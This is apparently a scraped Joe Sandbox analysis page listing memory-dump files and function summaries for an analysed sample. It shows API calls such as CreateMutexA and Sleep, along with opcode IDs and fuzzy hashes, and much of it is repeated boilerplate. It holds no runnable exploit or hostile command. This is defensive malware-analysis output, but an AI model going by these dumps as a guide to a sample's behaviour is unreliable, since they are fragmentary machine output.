Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: @2
API String ID: 1279760036-3701443097
Opcode ID: 88d3ef2870aefc5c4d6738ad9e2a69beb184c8a1fd4a547061d9b41da5972a72
Instruction ID: 843a5740d5d910c64ebce0c9c8a489bbf8e4a49b100f7f50723091634a56be03
Opcode Fuzzy Hash: 88d3ef2870aefc5c4d6738ad9e2a69beb184c8a1fd4a547061d9b41da5972a72
Instruction Fuzzy Hash: DCF0E93164E1A46E9B713B239C01B9B37C9DF817B0B288123AC98BA192EA71DC0053F1

Function 000BB0D0 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000BB2F8

Strings

p.gc, xrefs: 000BB0E7

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: p.gc
API String ID: 2538663250-2259671528
Opcode ID: e2f9d4bc9839f9e1f316952cfc262ecb0affcd8c81d7dc1a3d8924d215a9df0b
Instruction ID: 990acbc74e0a0f17266862f6b8cc120b9f1ec3f022959da6406ee2bf07824b92
Opcode Fuzzy Hash: e2f9d4bc9839f9e1f316952cfc262ecb0affcd8c81d7dc1a3d8924d215a9df0b
Instruction Fuzzy Hash: 73B10770A10268DFEB29CF14CD98BDEB7B5EF49304F5081D9E809A7281D775AA84CF91

Function 000B9AD5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b6accec5d80209763c710426dc8251f4a7021efcf314105e87755d6fb768df47
Instruction ID: b17f115da55fb66baa9ed7ba3ce593b88354865878fa1bba72c7172ccd18b1d4
Opcode Fuzzy Hash: b6accec5d80209763c710426dc8251f4a7021efcf314105e87755d6fb768df47
Instruction Fuzzy Hash: 38315B717142449BEB089B78ED8CBEDBA72DF8A310F20822CE114AB7D6DB7599818751

Function 000B9E74 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 747496e51e6b226c83b5e960d9340fc175e36b009a9018ce26361152e0a8e006
Instruction ID: 8c57bd98c48a44f61196acfdfdae6833ffec21ea400da4c452764d7ce779c393
Opcode Fuzzy Hash: 747496e51e6b226c83b5e960d9340fc175e36b009a9018ce26361152e0a8e006
Instruction Fuzzy Hash: 323146317102009BEB08DB68DD8C7ECB762DF8A320F20463CE124AB7D6DB7589818751

Function 000B9FA9 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 8cf605fb256697353bc1daea569c1f2745f47d547369115bb788700b04dbfce6
Instruction ID: 77fc73c1bd8609892a22c94a4b53b476d37c02072bb0044cd7c06fc32383597e
Opcode Fuzzy Hash: 8cf605fb256697353bc1daea569c1f2745f47d547369115bb788700b04dbfce6
Instruction Fuzzy Hash: 75314A317242449BEB18DB78DD88BEDB7729F86310F248238E114EB6D5CBB599818752

Function 000BA0DE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 000BA893
CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1

Memory Dump Source

Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
